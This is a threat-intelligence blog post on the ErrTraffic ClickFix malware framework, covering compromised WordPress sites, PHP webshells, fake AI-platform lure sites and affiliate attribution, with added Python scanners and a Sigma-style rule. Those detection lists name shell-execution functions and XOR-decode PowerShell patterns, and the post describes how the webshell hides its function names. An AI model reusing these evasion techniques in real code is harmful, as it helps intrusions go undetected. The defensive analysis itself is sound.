According to Flare.io, an administrator account was stolen via an infostealer in October 2025 and has been available in credential leak databases since February 2026. It is therefore highly probable that the attacker compromised this server using these credentials.

Notably, the compromised account is associated with an employee of a firm providing web design and SEO services. During our analysis, we identified several compromised sites whose only common denominator was being developed by this same agency, whose own website was also infected by the same ErrTraffic cluster. 

The compromise of service provider accounts is particularly valuable to attackers, as it allows them to scale their efforts by gaining access to an entire portfolio of client sites through a single set of credentials.

Compromise timeline and payloads

In the absence of web logs, the starting point for the analysis was the identification of ErrTraffic injection scripts. This investigation revealed a footprint significantly larger than that of standalone ErrTraffic injectors; several distinct families of PHP backdoors were also identified.

These malicious payloads differ in coding style but exhibit functional overlaps. Despite these differences, we assess that they are likely deployed and managed by the same operator. Three independent indicator classes link all observed artefacts to a single deploying entity:

  • Every file analysed contains an HTML comment marker of the exact form <!--[A-Za-z0-9]{8}--> at the top of the file; the alphanumeric identifier varies across samples but consistently adheres to the eight-character length and the mixed-case alphanumeric character set.
  • Attacker-generated filenames embed Unix epoch timestamps that match the corresponding file modification time, indicating that the deployment tool generates them automatically at write time.
  • The typosquatted naming repertoire (styIe.php, singIe.php, functlons.php, lndex.php, 4O4.php, connents.php) recurs across all batches and across all five families, indicating a common naming engine that operates independently of the deployed shell’s content.

The deployment timestamps reconstructed from filesystem mtime and from Unix-epoch suffixes embedded in attacker-generated filenames produce the following chronology. Each deploy corresponds to a discrete batch of files deposited within a two-to-five minute window, consistent with automated tooling rather than interactive operator activity. The epoch suffixes resolve down to the second to the corresponding modification timestamps, indicating that filenames are programmatically generated at deployment time.
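The fixed artefacts described for the “Analytics” backdoor (the session-manager.php MU-plugin, the __mu_deployer__ marker in functions.php, auto_prepend_file in .user.ini, the webanalytics-cdn beacon) and the three “Bintang” indicator classes above (the eight-character HTML comment marker, epoch-suffixed filenames matching mtime, typosquatted core filenames) all lend themselves to a filesystem scan. The following is an added example of such a scanner, not Sekoia’s own, run against a constructed webroot it builds itself; the look-alike glyph folding is a heuristic, and the hidden prepended script name in the sample is an assumption.

```python
"""Scan a WordPress webroot for the fixed artefacts described for the 'Analytics'
backdoor and the 'Bintang' toolkit. Added example, not Sekoia's scanner; the
sample site it builds is constructed and contains placeholders only."""
import os
import re
import tempfile

MU_PLUGIN = os.path.join("wp-content", "mu-plugins", "session-manager.php")
DEPLOYER_MARK = b"/* __mu_deployer__ */"
BEACON_DOMAIN = b"webanalytics-cdn"
HTML_MARKER_RE = re.compile(rb"^<!--[A-Za-z0-9]{8}-->")
EPOCH_RE = re.compile(r"(?<!\d)(\d{10})\.\w+$")
CANONICAL = {"style", "single", "functions", "index", "404", "comments"}
GLYPHS = str.maketrans({"I": "i", "l": "i", "1": "i", "O": "o", "0": "o"})


def skeleton(stem):
    """Fold look-alike glyphs so styIe/singIe/functlons/lndex/4O4/connents land on the real names."""
    s = stem.translate(GLYPHS).lower()
    for digraph in ("mm", "nn", "rn"):
        s = s.replace(digraph, "m")
    return s


CANONICAL_SKELETONS = {skeleton(c) for c in CANONICAL}


def scan(root, mtime_tolerance=2, read_limit=1 << 20):
    """Walk the webroot and return sorted (indicator, relative path) pairs."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            stem, ext = os.path.splitext(name)
            with open(full, "rb") as fh:
                data = fh.read(read_limit)
            if rel == MU_PLUGIN:
                hits.append(("analytics: MU-plugin implant path", rel))
            if name == "functions.php" and DEPLOYER_MARK in data:
                hits.append(("analytics: dropper marker in functions.php", rel))
            if name == ".user.ini" and b"auto_prepend_file" in data:
                hits.append(("analytics: auto_prepend_file in .user.ini", rel))
            if ext in (".php", ".js") and BEACON_DOMAIN in data:
                hits.append(("analytics: beacon/exfiltration domain", rel))
            if ext == ".php" and HTML_MARKER_RE.match(data):
                hits.append(("bintang: 8-char HTML comment marker", rel))
            m = EPOCH_RE.search(name)
            if m and abs(int(m.group(1)) - int(os.stat(full).st_mtime)) <= mtime_tolerance:
                hits.append(("bintang: epoch-suffixed filename matching mtime", rel))
            if ext == ".php" and stem.lower() not in CANONICAL and skeleton(stem) in CANONICAL_SKELETONS:
                hits.append(("bintang: typosquatted core filename", rel))
    return sorted(hits)


def build_sample_site():
    """Constructed webroot: one clean file plus one instance of each artefact (placeholders only)."""
    root = tempfile.mkdtemp(prefix="wp-sample-")

    def put(rel, content, mtime=None):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        if mtime is not None:
            os.utime(path, (mtime, mtime))

    put("index.php", b"<?php require __DIR__ . '/wp-blog-header.php';\n")              # legitimate
    put(os.path.join("wp-content", "themes", "hello-elementor", "functions.php"),
        b"<?php\n/* __mu_deployer__ */\n// placeholder, no payload\n/* __mu_deployer__ */\n")
    put(MU_PLUGIN, b"<?php // placeholder standing in for the implant\n")
    put(".user.ini", b"auto_prepend_file = wp-includes/.hidden.php\n")   # ASSUMPTION: hidden script name
    put(os.path.join("wp-content", "uploads", "wa.js"), b"// beacon to webanalytics-cdn (placeholder)\n")
    put(os.path.join("wp-content", "uploads", "2026", "03", "styIe.php"),
        b"<!--aB3dE9xQ-->\n<?php // placeholder\n")
    epoch = 1741200000
    put(os.path.join("wp-admin", "css", f"cache-{epoch}.php"), b"<?php // placeholder\n", mtime=epoch)
    return root


if __name__ == "__main__":
    for label, rel in scan(build_sample_site()):
        print(f"{label:50} {rel}")
```

Run it as `scan("/var/www/html")` on a live site; the glyph-folding check deliberately errs on the side of noise (a legitimately renamed Index.php is flagged too), which is the right trade-off for a hunt that a human reviews.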

It should be noted that sandbox detonations demonstrate that the ErrTraffic C2 servers linked to this smart contract were active in early March and went offline as of March 17, 2026. Since ErrTraffic operates as a MaaS, it can be assessed that the operator did not renew their subscription to the tool. As illustrated in the chart below, correlating this data with the deployment dates reveals that the operator implements specific tooling designed to inject ErrTraffic into WordPress pages. The transition to different tools coincides with the C2 infrastructure going offline; this suggests that the operator adapts their toolkit to repurpose or otherwise exploit the compromised WordPress instances. 

Figure: ErrTraffic “Bintang” campaign timeline

Arsenal overview

As detailed in the previous section, the investigation identified a multi-component toolkit. This chapter focuses exclusively on the tools directly associated with the ErrTraffic deployment.

ErrTraffic framework

The ErrTraffic framework deployed on the WordPress instance consists of two principal artifacts:

  • The PHP injector stub: A compact loader named file-updater-[a-zA-Z0-9]{8}.php, or a variant thereof, which dynamically hooks into the WordPress page-rendering process to load the second component.
  • The ErrTraffic JS injector: A JavaScript file (css.js) containing the XOR-encoded ErrTraffic injector.

Responsive webshell

This PHP payload is a webshell of 21.8 KB, designated internally as the “Responsive Webshell” due to the presence of this specific pattern within the code. It is a sophisticated, GUI-based PHP webshell that leverages modern web technologies (Bootstrap 5, FontAwesome, and SweetAlert2) to provide a “responsive” and user-friendly management console. It includes the following features:

  • Runtime function masking: The shell avoids static detection by storing critical PHP function names (e.g. system, shell_exec, file_get_contents) as hexadecimal strings in the $iniarray variable. These are decoded at runtime into a $func array using a custom hexa() function, ensuring that sensitive keywords never appear in the plaintext source code.
  • Environment preparation: Upon execution, the shell actively modifies the PHP environment to facilitate its operations. It attempts to disable error reporting, bypass execution time limits, and clear file status caches using @$func[33] (mapped to ini_set).
  • Full file system orchestration: The interface provides a comprehensive suite of file management capabilities:
    • Navigation: Directory traversal and breadcrumb generation.
    • Manipulation: Uploading (including multi-file support), renaming, editing, and deleting files/folders.
    • Permissions: Real-time chmod modification and file owner/group identification.
  • System reconnaissance: The shell includes a dedicated “Server Info” module (branded as BlackDragon) that audits the server’s capabilities, checking for the availability of mail(), curl, and MySQL, while extracting the disable_functions list to identify potential execution bottlenecks.

This shell accounts for the vast majority of deployments observed during March 2026. Its consistent deployment in multiple locations for each victim (typically three to six instances) suggests it acts as the primary access hub for the broker and is likely used to deploy the ErrTraffic framework.

The code contains internal references to “karma-syndicate” and “BlackDragon”, likely identifying the developer group or the specific toolkit version. Stylistic indicators found in the error messages of one variant include strings in Indonesian. This finding correlates with the filtering implemented by the ClickFix API, which blocks infections within Indonesia associated with this campaign. Taken together, these factors suggest that the operator of the “bintang” campaign deploying the ErrTraffic “Beer” cluster via this specific smart contract may be based in South East Asia.
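The two artifacts and the function-masking trick described above can be hunted for on a suspect WordPress install with a short script. The following is an added example written for this article, not Sekoia's tooling and not the operator's code: it walks a WordPress tree, flags any file whose name matches the file-updater-[a-zA-Z0-9]{8}.php pattern, and decodes hex string literals found in PHP files to see whether they spell sensitive function names, which is exactly the trick the $iniarray/hexa() masking relies on. The directory layout and sample files are constructed here, and the sensitive function names beyond system, shell_exec, file_get_contents and ini_set are assumptions.

```python
"""Hunt for the ErrTraffic injector stub and hex-masked webshell functions.

Added example, not Sekoia's or the operator's code. Only the stub filename
pattern and the hex-masking behaviour come from the report; the sample tree
written by build_sample_tree() is constructed and harmless.
"""
import re
import tempfile
from pathlib import Path

# Filename pattern the report gives for the PHP injector stub.
STUB_NAME_RE = re.compile(r"^file-updater-[a-zA-Z0-9]{8}\.php$")

# Quoted string literals consisting only of hex digits (at least three bytes).
HEX_LITERAL_RE = re.compile(r"""['"]([0-9a-fA-F]{6,})['"]""")

# Function names whose hex-masked presence is a strong webshell indicator.
# system, shell_exec, file_get_contents and ini_set are named in the report;
# the remaining entries are an assumed extension of that list.
SENSITIVE_FUNCS = {
    "system", "shell_exec", "file_get_contents", "ini_set",
    "exec", "passthru", "proc_open", "popen", "file_put_contents", "eval",
}


def hex_masked_functions(source: str) -> set:
    """Return sensitive PHP function names hidden as hex string literals."""
    found = set()
    for literal in HEX_LITERAL_RE.findall(source):
        if len(literal) % 2:
            continue  # odd length cannot encode whole bytes
        try:
            decoded = bytes.fromhex(literal).decode("ascii")
        except ValueError:  # UnicodeDecodeError is a subclass of ValueError
            continue  # e.g. a colour value such as 'ffffff'
        if decoded in SENSITIVE_FUNCS:
            found.add(decoded)
    return found


def hunt(root: str) -> list:
    """Walk a WordPress tree and return (relative path, reason) findings."""
    root_path = Path(root)
    findings = []
    php_files = sorted(root_path.rglob("*.php"),
                       key=lambda p: p.relative_to(root_path).as_posix())
    for path in php_files:
        rel = path.relative_to(root_path).as_posix()
        if STUB_NAME_RE.match(path.name):
            findings.append((rel, "injector-stub filename pattern"))
        masked = hex_masked_functions(path.read_text(errors="ignore"))
        if masked:
            findings.append((rel, "hex-masked functions: " + ", ".join(sorted(masked))))
    return findings


def build_sample_tree() -> str:
    """Write a constructed, inert mini WordPress tree and return its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-hunt-"))
    files = {
        # Benign plugin: 'ffffff' is hex but does not decode to ASCII text.
        "wp-content/plugins/demo/demo.php": "<?php $color = 'ffffff'; echo 'hello';",
        # Stand-in for the stub: only the filename pattern matters here.
        "wp-includes/file-updater-Ab12Cd34.php": "<?php // constructed stand-in, no payload",
        # Stand-in for the masked-function array; the literals decode to
        # system, shell_exec, file_get_contents and ini_set respectively.
        "wp-content/uploads/rs.php": (
            "<?php $iniarray = array('73797374656d', '7368656c6c5f65786563',"
            " '66696c655f6765745f636f6e74656e7473', '696e695f736574');"
        ),
    }
    for rel, content in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content)
    return str(root)


if __name__ == "__main__":
    for rel, reason in hunt(build_sample_tree()):
        print(f"{rel}: {reason}")
```

Run it against a real document root instead of the constructed tree by calling hunt("/var/www/html"); the hex-literal check is deliberately conservative (it only reports literals that decode exactly to a known function name), so it produces few false positives but will miss masking schemes other than plain hex.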

Based on the analysis of the toolkit associated with smart contract 0xb36482fE794B895695914779Db3909b471D1aA43, targeted scans were conducted across a sample of servers infected by the ErrTraffic Beer cluster. The low response rate indicates that only servers specifically tied to this smart contract responded to the probes.

This demonstrates that this specific toolkit is exclusively linked to this contract. Consequently, we can hypothesise that, for the “Beer” cluster, each smart contract represents a distinct operator or affiliate, each managing their own post-exploitation tools within the broader ErrTraffic framework.

Impersonated AI platform campaigns

Monitoring of the “Beer” cluster has revealed the existence of non-WordPress websites delivering ErrTraffic. These sites impersonate AI tools or platforms. Recently registered and mimicking the branding of the targeted companies, these websites are empty shells whose sole purpose is to deliver payloads via ErrTraffic. 

Through these lures, attackers specifically target developers and AI researchers, a demographic frequently possessing elevated system privileges. TDR assesses that the objective is to steal API tokens and credentials for premium AI platforms, which are highly lucrative assets on underground resale marketplaces.

Google Antigravity themed

The antigravity[.]study website presents itself as a multi-OS download page for the Google Antigravity tool. Google Antigravity is positioned as an agentic AI platform and high-performance computing framework.

The domain was registered on 15 May 2026 through the Global Domain Group and is hosted on a shared server. The website’s design replicates the branding and infographics typically associated with official Google software distribution portals. 

Upon accessing the site, the ErrTraffic JavaScript triggers a “Blue Screen of Death” (BSOD) ClickFix lure associated with the smart contract 0x5b7F9C87773fFc7FAbEFcBeDFe3527BCE98C328.

Executing the provided command restores the page’s visibility. However, analysis revealed that the website is entirely non-functional; all download links are empty <a> tags. These elements confirm that the site is a dedicated lure, constructed for the sole purpose of delivering ErrTraffic, likely through a malvertising campaign targeting AI users. The PowerShell command drops and executes an MSI file. Dynamic analysis via sandbox execution confirmed that this MSI functions as a loader that delivers DanaBot malware.

ChatGPT themed

The malicious domain chatgpt-web[.]vip mimics the official ChatGPT landing page and was registered on 22 May 2026 via Dynadot.

Upon accessing the page, the ErrTraffic JavaScript triggers a reCAPTCHA-themed ClickFix lure associated with the smart contract 0x53ffB04Ef13Bc4Cb12CE8Ac7b9532C254338dC3e. Similar to the Antigravity case, the site is an empty shell with no functional links.

The PowerShell command drops and extracts a large archive (exceeding 120 MB) containing multiple files. This is a well-known binary bloating technique designed to evade static analysis and automated sandbox scanning. In this instance, the final payload delivered was identified as HijackLoader.

Notably, the IP address hosting chatgpt-web[.]vip was previously associated with the domain defi-xstocks[.]vip. Registered on 18 April 2026, through Dynadot, this latter domain currently redirects to chatgpt-web[.]vip.

The defi-xstocks naming convention refers to XSTOCKS, a platform known for tokenising US stocks and ETFs on the blockchain, combined with the DeFi (Decentralised Finance) acronym. This overlap strongly suggests that the operator is targeting cryptocurrency users and Web3 investors, likely aiming to drain digital wallets or harvest highly sensitive financial credentials via the delivered payload.

Affiliation hypothesis

After unveiling both “Analytics” and “Beer” ErrTraffic clusters, investigating the campaigns spreading the framework, and examining the cybercrime services provided by LenAI, the TDR team sought to correlate these findings to identify the threat actors responsible for these ErrTraffic clusters and campaigns.

One framework, two clusters, multiple campaigns

As described in the “Clusters” subsection, the two identified ErrTraffic clusters differ in the following areas:

  • The URL endpoints previously used to retrieve the ClickFix lure: /api/css.js for the “Beer” cluster and /cf.js for the “Analytics” cluster.
  • JavaScript code sophistication: obfuscated scripts are used for the “Beer” cluster, whereas cleartext JavaScript is deployed in the “Analytics” cluster, except for the initial script.
  • The data parameter in the JSON-RPC queries differs between smart contracts, validating the use of distinct function calls for each cluster. 
  • The encryption of ErrTraffic API requests: exclusively implemented in the “Beer” cluster.
  • C2 infrastructures: differences exist across TLDs, domain registration details, and default HTTP responses.

Sekoia TDR analysts therefore assess with high confidence that these clusters use two distinct versions of the ErrTraffic framework and that their respective C2 infrastructures are operated by two different threat actors.

Forensic analysis of several compromised WordPress instances across both clusters, combined with the tracking of deployed backdoors, leads us to conclude with high confidence that:

  • The “Analytics” cluster is leveraged exclusively by a single campaign, which we named “Analytics” campaign, and consistently:
    • Uses the same PHP backdoor on compromised WordPress servers.
    • Relies on a single smart contract as a DDR mechanism.
    • Continues to distribute the Vidar infostealer as of April and May 2026.
  • The “Beer” cluster is used by multiple campaigns, including the “bintang” and suspected malvertising campaigns, according to the following technical evidence:
    • Campaigns associated with the “Beer” cluster are diverse, including compromised WordPress instances and malicious sites impersonating AI platforms assessed to be promoted via malvertising.
    • WordPress sites are compromised using varying backdoors and TTPs; furthermore, each smart contract appears to be uniquely paired with a specific backdoor.
    • Each smart contract delivers a distinct payload, with no identified overlap between them based on loader file types, crypters, or malware families. 

Thus, TDR analysts hypothesise that several threat actors use the ErrTraffic “Beer” cluster and its associated infrastructure to deliver their payloads. At any given time, each cybercriminal using the ErrTraffic “Beer” cluster conducts their own campaign and employs their own smart contract. It is highly likely that these cybercriminals independently deploy the malicious framework by embedding their contract address, either on a compromised WordPress instance or on a dedicated malicious website.

ErrTraffic affiliates

LenAI’s Malware-as-a-Service subscriptions and source code sales on Exploit.IN enable us to infer associations between ErrTraffic clusters and campaigns and specific threat actors.

  • “Beer” cluster: MaaS rentals

TDR analysts assess with high confidence that the “Beer” cluster is operated by LenAI and offered to ErrTraffic affiliates through a MaaS subscription. This assessment is based on multiple campaigns distributing various malware families via different initial access TTPs. This would also explain the unified C2 infrastructure, with domains likely registered by LenAI.

We believe each ErrTraffic affiliate accesses a dedicated smart contract tied to a C2 domain, used exclusively for their malware distribution activities, alongside an administration panel. To operate ErrTraffic, affiliates generate the initial JavaScript code to inject into compromised WordPress sites, embed their own contract address, and upload their malicious payload on the ErrTraffic panel.

  • “Analytics” cluster: source code

Regarding the “Analytics” cluster, we conclude that the cluster and its associated campaign are operated by a single threat actor who likely purchased the source code of an older version of ErrTraffic. This assessment is based on the unified C2 infrastructure, the exclusive Vidar payload distributed over recent months, and, in particular, the use of a single PHP backdoor on compromised WordPress sites. We believe that this cluster uses an older version of ErrTraffic, as evidenced by code differences in the JavaScript framework between the two clusters, including less advanced obfuscation of ErrTraffic communication, ClickFix JavaScript, and PowerShell commands.

During our investigation, we found no evidence that enables the identification of the threat actor behind this cluster and campaign. 

  • “Bintang” campaign: possible attribution

By monitoring the Exploit.IN thread advertising ErrTraffic, we identified an alleged customer operating under the handle tope who was “looking for an Indonesian bank provider” in another thread. Notably, this cybercriminal is the only English-speaking participant in the ErrTraffic thread. Pivoting to their Telegram profile @cybershell_master, we found that this threat actor belongs to the Telegram group @wshellmarketIND (“Webshell Market Indonesian”) and was active in other webshell-related channels (“Webshell Market Chat”, “Webshell Shell Markett obrolan” and “Webshell / Cpanel / Smtp / Rdp”). Additionally, tope is active in multiple threads related to malware, traffic, and cryptocurrency-targeted campaigns.

As detailed in the “bintang” campaign subsection, we identified Indonesian words within this campaign’s toolkit, including the webshell kit. Therefore, we assess with high confidence that the threat actor using the handle tope (aka cybershell_master) is an ErrTraffic customer on the subscription model who leverages advanced webshell skills to deploy the ErrTraffic framework on numerous compromised WordPress sites.

Detection opportunities

The ClickFix pages associated with ErrTraffic use PowerShell to distribute the final payload. In the case of ErrTraffic, the PowerShell command contains an XORed string that is decoded at runtime and executed. The de-XORed string contains classic dropper instructions: downloading and executing the binary.

ErrTraffic powershell cmdline

In some instances, the script downloads both the 7z executable and an archive containing the payload; the 7z binary is then used to extract the archive before the payload is executed. While these techniques are well-covered by standard XDR rules, it is possible to implement specific coverage for ErrTraffic by targeting unique patterns within the XORed command via PowerShell ScriptBlockText logging.

detection:
  selection:
    action.properties.ScriptBlockText|startswith: "<"
    action.properties.ScriptBlockText|contains|all:
      - "#>"
      - "-bxor[int][char]$"
      - "[convert]::ToInt32"
      - "-lt"
  condition: selection
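As an added illustration (not part of the original report and not Sekoia's rule engine), the selection above can be evaluated in plain Python against a few constructed PowerShell script-block events. Running it shows why the startswith condition matters alongside the contains|all tokens: a block that carries all four tokens but does not open with the “<” of a block comment is not flagged. The event contents and host names are made up for this demonstration; only the matching conditions come from the rule.

```python
"""Evaluate the ScriptBlockText selection above against constructed events.

Added example, not Sekoia's code. The conditions mirror the Sigma-style
selection in the report; Sigma string matching is case-insensitive by
default, so both sides are lowercased before comparison.
"""

STARTS_WITH = "<"
CONTAINS_ALL = ("#>", "-bxor[int][char]$", "[convert]::ToInt32", "-lt")


def matches_selection(script_block_text: str) -> bool:
    """True when the block starts with '<' and contains every required token."""
    text = script_block_text.lower()
    return text.startswith(STARTS_WITH) and all(
        token.lower() in text for token in CONTAINS_ALL
    )


# Constructed PowerShell script block logging (event ID 4104) records. None of
# these is real ErrTraffic code; they only exercise the matching conditions.
SAMPLE_EVENTS = [
    # Block comment header followed by a hex/XOR decode loop: should match.
    {"id": 1, "host": "WS-01", "ScriptBlockText":
        "<# x #>$e='4a4b';$o='';for($i=0;$i -lt $e.Length;$i+=2){"
        "$o+=[char]([convert]::ToInt32($e.Substring($i,2),16) -bxor[int][char]$k)};$o"},
    # Help-comment header plus a -lt comparison, but no XOR decoding: no match.
    {"id": 2, "host": "WS-02", "ScriptBlockText":
        "<# list small files #>Get-ChildItem | Where-Object { $_.Length -lt 1KB }"},
    # All four tokens present, but the block does not start with '<': no match.
    {"id": 3, "host": "WS-03", "ScriptBlockText":
        "$k=1;[char]([convert]::ToInt32('41',16) -bxor[int][char]$k);if(1 -lt 2){'#>'}"},
]


def triage(events) -> list:
    """Return (id, host) for every event whose ScriptBlockText matches."""
    return [(e["id"], e["host"]) for e in events
            if matches_selection(e["ScriptBlockText"])]


if __name__ == "__main__":
    for event_id, host in triage(SAMPLE_EVENTS):
        print(f"event {event_id} on {host}: ErrTraffic-style script block")
```

The same logic applies to any telemetry source that carries the full script block text (Windows event 4104, an EDR's script content field); it does not work on process command lines, because the XORed payload is usually delivered as the script body rather than as an argument.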

This method relies on PowerShell ScriptBlockText logging. However, this logging level is not enabled by default and the resulting data is not systematically collected. A high-confidence alternative involves monitoring for a specific behavioral sequence on a single asset:

  1. Initial connection: A network request to the blockchain services (e.g. Polygon, Quiknode, etc.) used by the EtherHiding technique implemented in ErrTraffic.
  2. Redirect / C2 connection: A subsequent connection to a domain with a rare TLD known to be used by ErrTraffic clusters, such as .beer, .monster, etc.
  3. Execution: The immediate launch of a PowerShell process following these network events.

By correlating this specific chain of events, it is possible to accurately detect the ErrTraffic infection behavior without relying solely on advanced log levels or static command signatures.
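The three-step host sequence described above, implemented over constructed telemetry as an added example (not Sekoia's detection engine): per host, it looks for a connection to a blockchain service, followed within a window by a connection to a domain on a rare TLD, followed by a PowerShell process start. The blockchain provider substrings, the TLD list, the five-minute window, and all destination names and timestamps are assumptions chosen for the demonstration; the report only names Polygon, Quiknode, .beer and .monster as examples.

```python
"""Correlate blockchain RPC -> rare-TLD domain -> PowerShell on one host.

Added example, not Sekoia's code. Matching lists and the window are assumed
starting points; the telemetry in SAMPLE_EVENTS is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

BLOCKCHAIN_HINTS = ("polygon", "quiknode")   # assumed provider substrings
RARE_TLDS = (".beer", ".monster")            # TLDs the report ties to ErrTraffic C2
WINDOW = timedelta(minutes=5)                # assumed; the report says "immediate"


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str
    kind: str    # "net": outbound connection, value = destination name
    value: str   # "proc": process start, value = image name


def is_blockchain_rpc(e: Event) -> bool:
    return e.kind == "net" and any(h in e.value.lower() for h in BLOCKCHAIN_HINTS)


def is_rare_tld(e: Event) -> bool:
    return e.kind == "net" and e.value.lower().endswith(RARE_TLDS)


def is_powershell(e: Event) -> bool:
    return e.kind == "proc" and e.value.lower() in ("powershell.exe", "pwsh.exe")


def correlate(events) -> list:
    """Return one (host, rpc_dest, c2_dest, powershell_ts) tuple per detected chain."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_host[e.host].append(e)

    alerts, seen = [], set()
    for host, evs in by_host.items():
        for i, start in enumerate(evs):
            if not is_blockchain_rpc(start):
                continue
            c2 = None
            for nxt in evs[i + 1:]:
                if nxt.ts - start.ts > WINDOW:
                    break                       # everything later is outside the window
                if c2 is None and is_rare_tld(nxt):
                    c2 = nxt                    # step 2 seen; now wait for step 3
                elif c2 is not None and is_powershell(nxt):
                    key = (host, nxt.ts)        # one alert per PowerShell start
                    if key not in seen:
                        seen.add(key)
                        alerts.append((host, start.value, c2.value, nxt.ts))
                    break
    return alerts


T0 = datetime(2026, 3, 1, 10, 0, 0)  # constructed timestamps
SAMPLE_EVENTS = [
    # WS-01: full chain, with an unrelated connection in between.
    Event(T0, "WS-01", "net", "rpc.polygon.example"),
    Event(T0 + timedelta(seconds=1), "WS-01", "net", "lure-constructed.beer"),
    Event(T0 + timedelta(seconds=2), "WS-01", "net", "www.example.com"),
    Event(T0 + timedelta(seconds=20), "WS-01", "proc", "powershell.exe"),
    # WS-02: a developer using an RPC endpoint and then PowerShell, but never
    # contacting a rare-TLD domain: no alert.
    Event(T0 + timedelta(minutes=5), "WS-02", "net", "api.quiknode.example"),
    Event(T0 + timedelta(minutes=5, seconds=30), "WS-02", "proc", "powershell.exe"),
    # WS-03: the first two steps, but PowerShell starts two hours later: no alert.
    Event(T0 + timedelta(hours=1), "WS-03", "net", "rpc.polygon.example"),
    Event(T0 + timedelta(hours=1, seconds=5), "WS-03", "net", "lure-constructed.monster"),
    Event(T0 + timedelta(hours=3), "WS-03", "proc", "powershell.exe"),
]


if __name__ == "__main__":
    for host, rpc, c2, ts in correlate(SAMPLE_EVENTS):
        print(f"{host}: {rpc} -> {c2} -> powershell at {ts.isoformat()}")
```

In production the two network steps are best fed from DNS or proxy logs and the third from process-creation telemetry; widen WINDOW cautiously, since the blockchain RPC step alone is common on developer and Web3 workstations and only the ordered chain carries the signal.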

Conclusion

Analysis of ErrTraffic demonstrates a widespread malicious framework, leveraging the ClickFix social engineering tactic and the EtherHiding technique, mostly deployed on compromised WordPress sites alongside malicious websites impersonating AI platforms. Because the ErrTraffic framework is modular, it adapts to multiple initial access vectors and features suitable Traffic Distribution System capabilities.

Since emerging in December 2025, its rapid expansion reflects growing adoption and a well established Malware-as-a-Service business within the cybercriminal ecosystem.

We assess with high confidence that the “Beer” cluster is related to the ErrTraffic MaaS offering. Affiliates therefore access a turnkey ClickFix framework to deploy within their malware distribution infrastructure. For this cluster, we assess that each affiliate campaign uses a distinct smart contract. Continuous monitoring of their contract addresses suggests steady onboarding of new affiliates into the MaaS platform, each distributing various malware families, including infostealers, RATs and loaders.

By leveraging the prominent ClickFix tactic and broadly exploiting vulnerable WordPress sites or impersonating well-known AI platforms, ErrTraffic affiliates have affected numerous users worldwide.

To protect our customers from ErrTraffic and other ClickFix-based frameworks (ClearFake, IClickFix), Sekoia.io analysts will continue proactive monitoring of these threats and tracking their C2 infrastructure.

Thank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by clicking here. You can also contact us at tdr[at]sekoia.io for further discussions or future IOCs.

IOCs

The indicators and YARA rule are available in CSV format with additional metadata in the SEKOIA-IO/Community GitHub repository.

More IoCs associated with these ErrTraffic clusters are available in Sekoia.io CTI feed.

Feel free to read other Sekoia.io TDR (Threat Detection & Research) analysis here:



Source: https://blog.sekoia.io/unveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework/